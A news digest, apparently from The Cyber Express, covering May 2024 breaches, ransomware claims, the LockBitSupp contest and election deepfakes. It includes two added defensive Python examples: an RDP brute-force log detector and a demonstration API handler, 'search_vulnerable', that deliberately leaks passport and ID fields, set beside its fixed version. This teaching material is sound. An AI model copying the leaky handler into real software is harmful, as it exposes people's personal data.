The U.K. military faced a data breach in which the information of serving UK military personnel was obtained. The attack targeted the Ministry of Defence’s payroll system, and information such as names, bank details and in some cases addresses was gathered. The hacker behind it has not been identified, but the Ministry has taken immediate action. The "personal HMRC-style information" of current and former members of the Royal Navy, Army and Royal Air Force was targeted. The Ministry of Defence is currently providing support for the personnel whose information was exfiltrated, which also involves informing veterans’ organisations. Defence Secretary Grant Shapps is expected to announce a "multi-point plan” when he updates MPs on the attack. Read More

India’s current election sees deepfakes, Prime Minister Modi calls for arrests of political parties responsible

India’s current Prime Minister Modi has announced that fake videos of him and other leaders making β€œstatements that we have never even thought of” have been circulating. This election, dubbed India’s first AI election, has led to police investigations of opposition parties who have made these videos, with Modi calling for arrests. Prior to this, investigations regarding fake videos of Bollywood actors criticising Modi were also taking place. In this situation, around nine people have been arrested, six of whom are members of Congress’ social media teams. Five of them have been released on bail, but arrests of higher-ranking social media members have been made. A tag, #ReleaseArunReddy, has been trending for Congress national social media co-ordinator Arun Reddy, who had shared the fake videos.

Germany and Poland accuse Russian Military Service of cyber-attacks

Germany has stated that an attack on its Social Democratic Party last year was carried out by a threat group believed to be linked to Russian military services. German Foreign Minister Annalena Baerbock said at a news conference in Australia that APT28, a threat group also known as Fancy Bear, has been β€œunambiguously” confirmed to have been behind the cyberattack. Additionally, Poland has joined in support of Germany and said that it was targeted by APT28 too. Poland has not revealed any details about the attack it faced, but Germany says it is working to repair the damage it suffered. Baerbock stated that β€œit was a state-sponsored Russian cyber-attack on Germany, and this is absolutely intolerable and unacceptable and will have consequences.”

Ukraine unveils new AI-generated foreign ministry spokesperson

Ukraine has just revealed an AI spokesperson generated to deliver official statements for the foreign ministry. The messages being delivered are written by humans, but the AI delivers them, moving animatedly and presenting herself as an individual by introducing herself as Victoria Shi. Victoria is modelled on a Ukrainian celebrity, Rosalie Nombre, who took part in her development and helped to model the AI's appearance and voice after her own. Ukraine’s foreign minister has said that she was developed for β€œsaving time and resources,” and described her as a β€œtechnological leap that no diplomatic service in the world has yet made.” Read More

Singapore passes new amendment to their cybersecurity bill which regulates temporary, high-risk attacks

A new amendment to Singapore’s Cybersecurity Law was passed by its Parliament to keep up with the country’s evolving critical infrastructure and to adapt to technological advancements. The changes regulate Systems of Temporary Cybersecurity Concern (STCC), which encompass systems most vulnerable to attacks in a limited period. This means the Cyber Security Agency of Singapore (CSA) can oversee Entities of Special Cybersecurity Interest (ESCIs), because disruption to them could affect the nation’s security as a whole. With the country’s defence, public health and safety, foreign relations, and economy at stake, the Bill is set to target critical national systems only, leaving ordinary businesses as they are. Read More

Eurovision becomes susceptible to cyberattacks as the world’s largest music competition takes place during conflict

The 68th Eurovision Song Contest is being held in Malmö, Sweden, this year amid tensions surrounding conflicts such as Israel and Gaza, and Russia and Ukraine. Security has been tightened: in 2019, hackers infiltrated the online stream of the semi-finals in Israel, displaying a missile-strike warning and images of attacks on Tel Aviv, the host city. There are several reports about hackers hijacking the broadcast, which over 167 million people tuned in to watch last year. The voting system could also be an issue with the finals coming up, but Malmö's police chief says he is more worried about disinformation. A spokesperson for the contest stated that "We are working closely with SVT's security team and the relevant authorities and expert partners to ensure we have the appropriate measures in place to protect from such risks."

Wrap Up

This week we've seen militaries and governments being cyber-attacked, which truly reminds us how interconnected everything is. If big organisations are vulnerable to attacks, then so are we. TCE Cyberwatch hopes that everyone stays vigilant in the current climate of increased cyberattack risk, stays protected, and remains on the lookout for any threats that could affect them.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Cybersecurity Startup Treacle Raises About 40 million in Pre-Seeding Round

By: Alan J
11 May 2024 at 01:50

Treacle cybersecurity startup

Treacle, a cybersecurity startup founded in 2021 by Subhasis Mukhopadhyay, Subhajit Manna, and Partha Das, has raised about 40 million in its pre-Series A funding round. This milestone underscores the company's rapid growth and recognition within the industry. Founded by three seasoned entrepreneurs, Treacle has been deliberate in its mission to develop cutting-edge cybersecurity solutions that safeguard businesses from the ever-evolving threat landscape. With this latest injection of capital, the company plans to expand its product offerings, enhance its research and development capabilities, and further solidify its presence in the market. The pre-seed funding round, which marks a significant milestone for the startup, is expected to propel Treacle's growth trajectory. The company's founders believe that this influx of capital will enable them to accelerate their goals. The funding was led by prominent investors who have shown a keen interest in Treacle's approach to tackling modern digital threats.

Treacle Offers Defensive Cyber Security Solutions

Treacle serves both private and government sectors with solutions developed through rigorous research. Subhasis Mukhopadhyay stated, "Our mission centers on safeguarding network infrastructures through early detection, containment, and deception of threats. We're committed to delivering unparalleled value in the market, ensuring our clients have access to premium security solutions affordably. Our goal is to establish ourselves as a market leader and create a safer cyber world within the next five to six years."

Treacle's standout product is its AI-Based Proactive Defense System with built-in Deception. The service is designed to protect businesses even after their firewalls and other defensive layers have been breached. It works by tracking and analyzing attacker behavior at an early stage, then luring the attacker into a complex, containerized mirage network. This strategy keeps other systems safe and also gathers data about the threat, which is used to provide early warnings to SOC analysts so that an attack can be stopped before it takes place. Treacle also offers a range of other services, including Customized Honeypot Solutions, Network and Host-Based Intrusion Detection Systems, Insider Threat Detection Systems, and OT Network Security Systems. Additionally, the company can conduct thorough Cyber Security Audits and help design effective security policies. Vikram Ramasubramanian, Partner at Inflection Point Ventures, highlighted Treacle's core strengths in AI-Based Deception Technology, a cornerstone of its Defensive Cyber Security solutions. The company plans to introduce new features and enhancements that will further strengthen its security offerings and provide even greater value to its clients.

Company Growth and Achievements

Since its inception, Treacle has achieved significant milestones. The firm secured the C3iHub Grant and the SISFS Grant in 2021 and 2022, respectively. Treacle also represented India under DPIIT and took part in a sponsored delegation trip to Dubai in 2022. It won a significant grant from the Department of Telecommunications, Government of India, at DCIS 2023, and was named Best Student-Led Startup in the AWS Campus Fund Grand Challenge 2023. Treacle's journey began in June 2021, when its pioneering product idea was selected for investment. Its approach to developing a Deception Technology solution caught the attention of C3iHub, which led to early funding, and the team's dedication and hard work then secured the prestigious SISFS grant from the Government of India. Since July 2021, Treacle has been part of the IHub Programme, incubated at SIIC, IIT Kanpur, which has further strengthened its commitment to developing cybersecurity solutions that stand the test of time. The company's founders are confident that the new capital will enable them to accelerate their innovation pipeline, build a stronger team, and ultimately drive greater value for their customers. The startup's vision is to empower organizations with advanced cybersecurity solutions that provide real-time protection against emerging threats. With this vision in mind, Treacle is poised to make a significant impact on the cybersecurity landscape, and this latest funding round is a testament to the company's potential for growth and success. "Securing this funding allows us to accelerate our roadmap and bring our next-generation cybersecurity solutions to a wider audience," said Subhasis Mukhopadhyay, CEO of Treacle. "We are grateful for the support from our investors and are eager to continue our journey in making the digital world safer for everyone."

LockBitSupp Denies Identification of Group 'Admin', Opens Contest to Find the Named Dmitry Yuryevich

By: Alan J
10 May 2024 at 04:11

LockBitSupp Contest Dmitry Yuryevich Khoroshev

In an unexpected turn of events, LockBitSupp, the administrator of the notorious LockBit ransomware group, responded publicly to the Federal Bureau of Investigation (FBI) and international law enforcement's efforts to identify and apprehend him. After bringing back previously seized domains, law enforcement identified Dmitry Yuryevich Khoroshev as the mastermind behind the LockBit operations in an earlier public announcement. This was followed by official sanctions issued by the U.S., U.K., and Australia, accompanied by 26 criminal charges ranging from extortion to hacking, collectively carrying a potential maximum sentence of 185 years imprisonment. The Justice Department has also offered a staggering $10 million reward for information leading to Khoroshev's capture. However, LockBitSupp denied the allegations and attempted to turn the situation into a peculiar contest on the group's remaining leak site.

LockBitSupp Opens Contest to Seek Contact with Individual

The LockBit admin made a post on the group's leak site about a new contest (contest.omg) encouraging individuals to attempt to contact Dmitry Yuryevich Khoroshev. The announcement asserts that the FBI is wrong in its assessment and that the named individual is not LockBitSupp. It attributes the alleged misidentification to the named individual's cryptocurrency having been mixed with the ransomware admin's own funds, which they claim must have attracted the attention of the FBI. Cryptocurrency mixing blends different streams of potentially identifiable cryptocurrency to make transactions harder to trace. The contest brazenly invites participants to reach out to the individual believed to be Dmitry Yuryevich Khoroshev and report back on his wellbeing for $1,000. The ransomware admin claimed that the first person to provide evidence such as videos, photos, or screenshots confirming contact with the "poor guy," as LockBitSupp refers to him, would receive the reward. (Image source: X.com, @RedHatPentester) Participants were instructed to send their findings through the encrypted messaging platform Tox, using a specific Tox ID provided by LockBitSupp.

LockBitSupp Shares Details of Named Individual

In addition to the contest details, LockBitSupp shared multiple links to LockBit-associated file-sharing services on the dark web, presumably for individuals to archive gathered details and submit them as contest entries. They also listed extensive personal details alleged to belong to Dmitry Khoroshev, including email addresses, a Bitcoin wallet address, and passport and tax identification numbers. Amid the defiance and contest announcement, LockBitSupp expressed concern for the well-being of the person they claim has been mistakenly identified as them, urging Dmitry Yuryevich Khoroshev, if alive and aware of the announcement, to make contact. This unusual move by LockBitSupp challenges the statement made by law enforcement agencies and underscores the complex dynamics of the cyber underworld, where hackers openly taunt their pursuers. LockBitSupp emphasized that the contest will remain open as long as the announcement is visible on the blog. The admin hinted at similar contests in the future with more substantial rewards, urging followers to stay tuned for updates. The announcement was uploaded and last updated on May 9, 2024, UTC, leaving the public and the cybersecurity community watching closely for further developments. In a recent indictment, Khoroshev was identified as being behind LockBit's operations and as having functioned as the group's administrator since September 2019. Khoroshev and the LockBit group were stated to have extorted at least $500 million from victims in 120 countries across the world, with Khoroshev himself receiving around $100m from the activity.

International Baccalaureate Exam Hack Speculation Sparks Student Outrage

By: Alan J
9 May 2024 at 09:45

International Baccalaureate Exam Hack

The International Baccalaureate Organization (IBO) confirmed a hacking incident, while clarifying that no ongoing exam papers were leaked despite claims online of a wider cheating scandal. The IB found students sharing exam details online before the completion of their ongoing tests globally, and simultaneously observed increased malicious activity targeting its computer networks. On investigating the online claims, IB found that the leaked data set appeared to be limited to earlier data from 2018, while the ongoing exam paper leaks could be a result of some students sharing exam papers online rather than a hack. Founded in 1968, the International Baccalaureate is a non-profit educational organization based in Geneva, Switzerland. It aims to provide high quality international education free of regional, political or educational agendas.

Exam Cheating Concerns Amidst International Baccalaureate Hack

Earlier last week, the International Baccalaureate had released an update stating that it was investigating online speculation about potential cheating by some students in the ongoing exams. The organization stated that while there was no evidence of widespread cheating, some students might have engaged in "time zone cheating". The organization defined time zone cheating as an action where students "who have completed their examinations share what they can recall from memory about the exam questions on social media before other students take the examination." Citing its own academic integrity policy which forbids such behaviour, the organization stated that students engaging in such activity would not receive their Diploma certificates or grades and may potentially be banned from future exam retests. (Image: International Baccalaureate exam hack update. Source: Official Update) After its initial investigations, the organization stated that it had experienced an increase in attempted malicious activity aiming to interfere with its systems. It also confirmed that some data from 2018, including employee names, positions, and emails, had been breached through a third-party vendor, and screenshots of this leaked data were shared online. However, the organization again clarified that at the time of the investigation, no recent exam material was found to be compromised. The notice further stated that IB was continuing to assess the incident and had taken steps to contain the incident. The organization mentioned that it would provide further information on the incident as the situation evolved. The Cyber Express team has reached out to the International Baccalaureate for further details, and a spokesman responded with a link to the second update notification.

Students Petition For Exam Cancellation

The exam is taken by nearly 180,000 students internationally. Recent speculation over the hacking incident and cheating allegations has raised concerns among students and their parents, leading to an online petition demanding exam cancellation or a re-test. Amid the speculation, the International Baccalaureate took action to remove leaked content and stated that cheaters would face severe consequences. Some condemned the leaks as failures in governance and urged improved exam security, prompting the IB to affirm its intention to stay ahead of technological threats while promoting academic integrity in the exam process. The IB further cautioned its authorized network of schools about data breaches and phishing attempts. The leaked materials from the International Baccalaureate data breach were observed to have been downloaded over 45,000 times. The leaked content allegedly included mathematics and physics papers which were widely circulated online, further raising doubts about exam integrity. It remains to be seen whether the student petition's demands for justice or the organization's observation of increased hacking attempts will lead to a further escalation of the situation.

Medusa Ransomware Claims UK-based Defense Solutions Provider Chemring Group as Victim

By: Alan J
9 May 2024 at 05:35

Chemring Group data breach

The Medusa ransomware group has demanded $3.5 million from the Chemring Group on its leak site, along with a threat to leak 186.78 GB of sensitive documents claimed to have been obtained in the Chemring Group data breach. The group set the negotiation deadline as May 16, 2024, giving the victim about nine days to surrender to its demands, while also presenting additional options such as prolonging the negotiation period and removing or downloading the allegedly stolen data, at varying prices. The Chemring Group is a multinational UK-based business that provides a range of technology solutions and services to the aerospace, defence and security markets around the world. The Chemring Group data breach post was shared on the threat actor's data leak site alongside three American organizations listed as victims. However, the authenticity of these claims is yet to be verified. While the Chemring Group refutes any major compromise, it has confirmed an ongoing investigation into the alleged data breach.

Medusa Hackers Demand $3.5 Million Following Chemring Group Data Breach

On the leak site, the ransomware group demanded a ransom of 3.5 million USD with a negotiation deadline of 16 May 2024. The group allegedly exfiltrated 186.78 GB of confidential documents, databases, and SolidWorks design files. However, no sample data had been shared, making it harder to verify the group's claims. Additionally, the leak site offered the victim the options of adding an extra day of ransom negotiations for 1 million, deleting all the data for 3.5 million, or downloading/deleting the exfiltrated data for 3.5 million. (Image source: X.com / @H4ckManac) The Chemring Group PLC listing was accompanied by listings of three other alleged victim organizations: One Toyota of Oakland, Merritt Properties and Autobell Car Wash. When contacted by The Cyber Express team for additional details, a Chemring Group spokesman made the following statement about the alleged ransomware attack:
Chemring has been made aware of a post that has appeared on X (formerly Twitter) alleging that the Group has been subject to a ransomware attack. An investigation has been launched, however there is currently nothing to indicate any compromise of the Group's IT systems, nor have we received any communication from a threat actor suggesting that we have been breached. We confirm that all Chemring businesses are operating normally. Our preliminary investigations lead us to believe that this attack was on a business previously owned by Chemring but where there is no ongoing relationship or connection into our IT systems. As this is subject to an ongoing criminal investigation we cannot comment further at this stage.

Who is Medusa Ransomware Group?

The MedusaLocker ransomware group is known to have been active since September 2019. The group usually gains initial access to victims' networks by exploiting known vulnerabilities in Remote Desktop Protocol (RDP). The Medusa ransomware group has been observed to step up its attack campaigns since the debut of its dedicated data leak site in February 2023. The group primarily targets healthcare, education and public-sector organizations in its campaigns. The group was previously responsible for an attack on Toyota in December 2023 in which it obtained access to sensitive details such as names, addresses, contact information, lease-purchase details, and IBAN numbers. The incident prompted the company to adopt stronger data protection measures and to notify affected customers while reporting details of the breach to the relevant authorities.
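The initial-access vector named above, RDP, is also one of the easiest to watch for. The following is an added example, not code from the Medusa reporting or from The Cyber Express, that runs two defensive checks over constructed Windows Security event lines: a burst of failed logons (Event ID 4625) from one source address followed by a successful RemoteInteractive logon (Event ID 4624, LogonType 10), and any successful RDP logon whose source lies outside an assumed list of internal networks. The flattened key=value log format, the RFC 1918 internal ranges, the host, the user names and the TEST-NET address 203.0.113.10 are all constructed placeholders.

```python
"""Detecting suspicious RDP logons in Windows Security events.

Added example; not code from the Medusa reporting or from The Cyber Express.
The events below are constructed samples flattened to one key=value line each
(real events arrive as EVTX/XML); users and addresses are placeholders.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

# Constructed sample log: six failures from an external address, then a
# success from the same address with a different account; later an internal
# user mistypes a password once and logs in normally.
SAMPLE_EVENTS = """\
2024-05-08T02:11:00Z EventID=4625 TargetUser=administrator IpAddress=203.0.113.10 LogonType=10 Status=0xC000006D
2024-05-08T02:11:02Z EventID=4625 TargetUser=administrator IpAddress=203.0.113.10 LogonType=10 Status=0xC000006D
2024-05-08T02:11:05Z EventID=4625 TargetUser=admin IpAddress=203.0.113.10 LogonType=10 Status=0xC000006D
2024-05-08T02:11:09Z EventID=4625 TargetUser=backup IpAddress=203.0.113.10 LogonType=10 Status=0xC000006D
2024-05-08T02:11:14Z EventID=4625 TargetUser=svc_backup IpAddress=203.0.113.10 LogonType=10 Status=0xC000006D
2024-05-08T02:11:20Z EventID=4625 TargetUser=svc_backup IpAddress=203.0.113.10 LogonType=10 Status=0xC000006D
2024-05-08T02:13:30Z EventID=4624 TargetUser=svc_backup IpAddress=203.0.113.10 LogonType=10
2024-05-08T09:00:00Z EventID=4624 TargetUser=j.doe IpAddress=10.0.5.20 LogonType=10
2024-05-08T09:05:00Z EventID=4625 TargetUser=j.doe IpAddress=10.0.5.20 LogonType=10 Status=0xC000006A
2024-05-08T09:05:30Z EventID=4624 TargetUser=j.doe IpAddress=10.0.5.20 LogonType=10
"""

FAILURE_THRESHOLD = 5           # failed attempts that make a later success suspicious
WINDOW = timedelta(minutes=10)  # look-back window for those failures

# Assumed internal address space (RFC 1918 ranges as a placeholder allow-list);
# a real deployment would use the organisation's own ranges.
INTERNAL_NETWORKS = [ipaddress.ip_network(n)
                     for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_event(line: str) -> dict:
    """Turn one 'timestamp key=value ...' line into a dict with a datetime 'ts'."""
    ts_text, *pairs = line.split()
    event = {"ts": datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")}
    for pair in pairs:
        key, _, value = pair.partition("=")
        event[key] = value
    return event


def parse_events(text: str) -> list:
    return [parse_event(line) for line in text.splitlines() if line.strip()]


def detect_rdp_brute_force(events, threshold=FAILURE_THRESHOLD, window=WINDOW) -> list:
    """Alert on a 4624/LogonType=10 success preceded, within `window`, by at
    least `threshold` 4625 failures from the same source address.
    Events are assumed to be in chronological order."""
    failures = defaultdict(list)   # source IP -> timestamps of failed logons
    alerts = []
    for ev in events:
        ip = ev.get("IpAddress", "-")
        if ev.get("EventID") == "4625":
            failures[ip].append(ev["ts"])
        elif ev.get("EventID") == "4624" and ev.get("LogonType") == "10":
            recent = [t for t in failures[ip] if ev["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append({
                    "source_ip": ip,
                    "failures": len(recent),
                    "success_user": ev.get("TargetUser"),
                    "success_time": ev["ts"].isoformat(),
                })
    return alerts


def external_rdp_logons(events) -> list:
    """Second check: successful RDP logons whose source is not in any internal
    range. Any hit means RDP is reachable from outside, the exposure the group
    above is described as exploiting."""
    hits = []
    for ev in events:
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "10":
            continue
        try:
            addr = ipaddress.ip_address(ev.get("IpAddress", "-"))
        except ValueError:          # '-' is used for local/console logons
            continue
        if not any(addr in net for net in INTERNAL_NETWORKS):
            hits.append((str(addr), ev.get("TargetUser")))
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for alert in detect_rdp_brute_force(evs):
        print("brute force followed by success:", alert)
    for ip, user in external_rdp_logons(evs):
        print("RDP success from non-internal address:", ip, user)
```

On the sample data the first check raises one alert (six failures from 203.0.113.10, then a success as svc_backup) and the second flags the same address; the internal user's single typo does not reach the threshold. In production the same logic would be fed from a SIEM query rather than a string, and the threshold and window tuned to the environment.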

Hong Kong Fire Department Issues Data Breach Notification

By: Alan J
8 May 2024 at 04:58

Hong Kong Fire Department Data Breach

The Hong Kong fire department has uncovered a recent breach of its computer system that exposed the personal information of over 5,000 department personnel and hundreds of residents. The Hong Kong Fire Department data breach, the third incident involving government data in less than a week, stems from an unauthorized change in privileged access rights during a data migration procedure carried out by an outsourced contractor, according to a statement from the Fire Services Department (FSD). The Hong Kong Fire Services Department is an emergency firefighting government service that conducts rescue operations on land and at sea. The department is also responsible for providing emergency ambulance service for the sick and injured, as well as fire protection advice to the general public. There is no evidence that the data from the Hong Kong Fire Department data breach has been published online.

Systems Suspended Following Hong Kong Fire Department Data Breach

(Image source: Shutterstock) Following the discovery of the intrusion, the fire department suspended the affected system and launched an investigation along with the third-party contractor. The department immediately revoked the contractor's access rights to prevent further data leakage and implemented enhanced security measures to prevent similar incidents. The compromised data included the last names and phone numbers of approximately 480 individuals who reported tree collapse incidents during Super Typhoon Saola in September 2023. Additionally, personal details such as names, phone numbers, and ranks of around 5,000 FSD staff were at risk, with 960 personnel having their incomplete identity card numbers exposed in the breach. Details of the breach were reported to the relevant authorities, including the Police, the Security Bureau, the Privacy Commissioner for Personal Data, and the Government Chief Information Officer. "The FSD believes that the incident happened when the outsourced contractor handled the data migration procedure. During the process, the access right of the data was found altered without authorisation, posing a potential risk of data leakage," a Fire Services Department spokesperson stated. The Hong Kong Fire Services Department apologised for the incident and notified those affected through text messages or phone calls. However, the department assured the public that there was no evidence the data had been leaked as yet.

Data Breach Follows Two Cyber-Incidents within the Same Week

This Hong Kong Fire Department data breach follows similar incidents involving the Electrical and Mechanical Services Department (EMSD) and the Companies Registry last week, in which data stored on their servers was compromised. Lawmaker Elizabeth Quat, who heads the Panel on Information Technology and Broadcasting, has called for improved data security measures and a punishment mechanism for future incidents and similar blunders. The EMSD system glitch last Tuesday allowed unauthorized access to the names, telephone numbers, identity card numbers and addresses of around 17,000 individuals through the server platform without requiring a password. The Companies Registry stated last Friday that security flaws in its online e-Services Portal, developed by a third-party contractor, resulted in the transmission of additional personal data beyond what the client computer requested during searches. While this additional data was not displayed directly, it could be obtained through the use of web developer tools. The additional data was estimated to affect about 110,000 data subjects and included their names, full passport numbers, identity card numbers, residential addresses, telephone numbers and email addresses. The city's privacy watchdog reported a significant increase in data breach notifications last year, signaling a growing concern for data protection. In a recent case involving Cyberport, a government-owned tech hub, the watchdog identified lapses in security audits and unnecessary retention of personal data, highlighting the need for better oversight in handling sensitive information. The string of government-related data breaches highlights the security weaknesses that dependence on external third-party contractors can introduce. This weakness remains a major problem globally, as seen in the recent UK Ministry of Defense data breach stemming from an external payroll provider.
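The Companies Registry flaw above, a response carrying more fields than the page displays, is a textbook case of excessive data exposure in an API, and the fix is to project each record onto a field allow-list on the server before serialisation rather than trusting the front end to hide columns. The following added example (not code from the Companies Registry portal or from The Cyber Express) shows the over-fetching handler beside its hardened form and a response-side check that can serve as a regression test or gateway filter; all records, field names and identifier values are constructed placeholders.

```python
"""Field allow-listing for a public search API.

Added example; not code from the Companies Registry portal or from The Cyber
Express. The records and every identifier value below are constructed
placeholders.
"""
import json

# Constructed sample records for an officer search; nothing here is real data.
OFFICER_RECORDS = [
    {
        "company": "Example Trading Limited",
        "officer_name": "A. Director",
        "role": "Director",
        "passport_number": "PLACEHOLDER-PASSPORT-1",
        "id_card_number": "PLACEHOLDER-ID-1",
        "residential_address": "1 Placeholder Road",
        "phone": "+000-0000-0001",
        "email": "director1@example.invalid",
    },
    {
        "company": "Example Trading Limited",
        "officer_name": "B. Secretary",
        "role": "Secretary",
        "passport_number": "PLACEHOLDER-PASSPORT-2",
        "id_card_number": "PLACEHOLDER-ID-2",
        "residential_address": "2 Placeholder Road",
        "phone": "+000-0000-0002",
        "email": "secretary2@example.invalid",
    },
    {
        "company": "Other Holdings Limited",
        "officer_name": "C. Director",
        "role": "Director",
        "passport_number": "PLACEHOLDER-PASSPORT-3",
        "id_card_number": "PLACEHOLDER-ID-3",
        "residential_address": "3 Placeholder Road",
        "phone": "+000-0000-0003",
        "email": "director3@example.invalid",
    },
]

# What an anonymous search may learn about an officer. An allow-list (rather
# than a deny-list of sensitive columns) means a column added to the table
# later is withheld until someone deliberately exposes it.
PUBLIC_FIELDS = frozenset({"company", "officer_name", "role"})


def _matches(query: str) -> list:
    q = query.lower()
    return [r for r in OFFICER_RECORDS if q in r["company"].lower()]


def search_vulnerable(query: str) -> list:
    """Over-fetching handler: hands the client every column of each match.
    The page may render only company, name and role, but the JSON body that
    developer tools show carries passport and ID numbers as well."""
    return [dict(r) for r in _matches(query)]


def project(record: dict, allowed: frozenset) -> dict:
    """Keep only the allow-listed keys of one record."""
    return {k: v for k, v in record.items() if k in allowed}


def search_hardened(query: str, allowed: frozenset = PUBLIC_FIELDS) -> list:
    """Projection happens server-side, before serialisation, so nothing
    outside `allowed` ever reaches the wire."""
    return [project(r, allowed) for r in _matches(query)]


def overexposed_fields(response: list, allowed: frozenset = PUBLIC_FIELDS) -> set:
    """Response-side check for a regression test or an API gateway: the set of
    keys present in a response that the caller is not entitled to."""
    extra = set()
    for item in response:
        extra.update(set(item) - allowed)
    return extra


if __name__ == "__main__":
    # What a browser's developer tools would show for each handler.
    print(json.dumps(search_vulnerable("example"), indent=2))
    print(json.dumps(search_hardened("example"), indent=2))
    print("leaked keys:", sorted(overexposed_fields(search_vulnerable("example"))))
```

Run on the sample data, the vulnerable handler leaks five columns per record (passport, ID card, address, phone, email) while the hardened one leaks none. Keeping `overexposed_fields` in the test suite catches the regression the registry suffered: a later change that serialises a whole ORM object again fails the test before it reaches production.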

Brandywine Realty Trust Confirms Data Breach After Ransomware Attack

By: Alan J
8 May 2024 at 02:11

Brandywine Realty Trust data breach

Brandywine Realty Trust issued a recent filing to the US Securities and Exchange Commission (SEC) confirming that an unauthorized third party had gained access to portions of its internal network. The Brandywine Realty Trust data breach is stated to have affected the functioning of some of its internal systems, following preventative measures taken as part of the firm's incident response plan. Brandywine Realty Trust is one of the largest publicly traded real estate companies in the United States, with a primary focus on the Philadelphia, Texas and Austin markets. The firm is organized as a real estate investment trust and manages 69 properties comprising 12.7 million square feet spanning multiple states. Upon detecting the intrusion, the trust initiated its response protocols and took steps to contain affected systems, assess the extent of the attack and move towards remediation. Investigative efforts were conducted together with external cybersecurity professionals, and details were shared with law enforcement.

Brandywine Realty Trust Data Breach Disrupted Trust's Operations

The filing reveals that, along with unauthorized access to its internal systems, the attack also involved the encryption of some of the company's internal resources. The encryption disrupted access to portions of the company's business applications responsible for several internal and corporate functions, including its financial and reporting systems. The company disclosed that certain files were stolen during the attack, but that it is still working to determine the extent of sensitive and confidential information accessed during the intrusion into its IT systems and to establish whether any personal information was accessed. The company believes that the intrusion has been contained from spreading further into its systems and stated that it is working diligently to bring its IT systems back online. The company is also evaluating whether any additional regulatory and legal notifications are required and will issue appropriate notifications according to its findings.

Perpetrator Behind Brandywine Realty Trust Data Breach Unknown

The company is known to have rented out commercial properties to various prominent firms, its biggest tenants including IBM, Spark Therapeutics, Comcast, and the FMC Corporation. The attack comes during a period of increased volatility in the commercial office space, with Brandywine recently cutting its quarterly dividend from 19 cents to 15 cents a share, the first cut since 2009. In a recent interview, the company's CEO acknowledged "turbulent times" in the commercial real estate space and said the company aimed to cover its "danger points." He added that the company has plenty of cash and available credit, noting that, compared to its peers, the firm has a substantially lower number of leases set to expire over the next few years.

As the investigation of the incident is ongoing, the full scope, nature and impact of the incident are not yet known. No threat actor, individual or group, appears to have claimed responsibility for the attack yet. The disclosure likely follows the introduction of new rules by the U.S. government in December 2023 requiring publicly traded companies to disclose security incidents they believe may have a material impact on the business. However, Brandywine indicated in its filing that it does not believe the incident is 'reasonably likely to materially impact the Company's financial condition or results of operations.'